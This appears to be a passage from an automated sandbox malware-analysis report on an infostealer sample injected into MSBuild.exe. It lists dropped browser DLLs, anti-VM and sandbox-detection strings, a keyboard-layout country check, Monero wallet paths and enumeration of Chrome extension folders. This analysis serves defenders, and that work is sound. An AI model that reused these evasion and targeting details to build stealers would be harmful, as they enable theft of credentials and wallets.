                          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                          Source: freebl3.dll.4.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.4.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                          Source: softokn3.dll.4.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.4.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066701A push ecx; ret 0_2_0066702D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006171D0 push ecx; ret 0_2_006171E3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006673E8 push cs; ret 0_2_006673E9
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006673B8 push esp; retn 0003h0_2_006673BD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006699ED push 0000004Ch; iretd 0_2_006699FE
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00655C8D push ecx; ret 0_2_00655CA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042F142 push ecx; ret 4_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00422D3B push esi; ret 4_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041DDB5 push ecx; ret 4_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00432715 push 0000004Ch; iretd 4_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BB536 push ecx; ret 4_2_6C8BB549
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B6686B push edx; ret 13_2_00B66873
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF71D0 push ecx; ret 13_2_00AF71E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\CBFCFBFBFB.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\CBFCFBFBFB.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Country aware sample found (crashes after keyboard check)
                          Source: c:\users\user\desktop\file.exeEvent Logs and Signature results: Application crash and keyboard check
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: file.exe, MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                          Source: file.exe, MSBuild.exeBinary or memory string: SBIEDLL.DLL
                          Source: file.exe, MSBuild.exeBinary or memory string: API_LOG.DLL
                          Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,4_2_0040180D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeAPI coverage: 1.6 %
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 7.8 %
                          Source: C:\ProgramData\CBFCFBFBFB.exeAPI coverage: 1.7 %
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6052Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4420Thread sleep count: 78 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh4_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062735B FindFirstFileExW,0_2_0062735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B0735B FindFirstFileExW,13_2_00B0735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410FBA GetSystemInfo,wsprintfA,4_2_00410FBA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
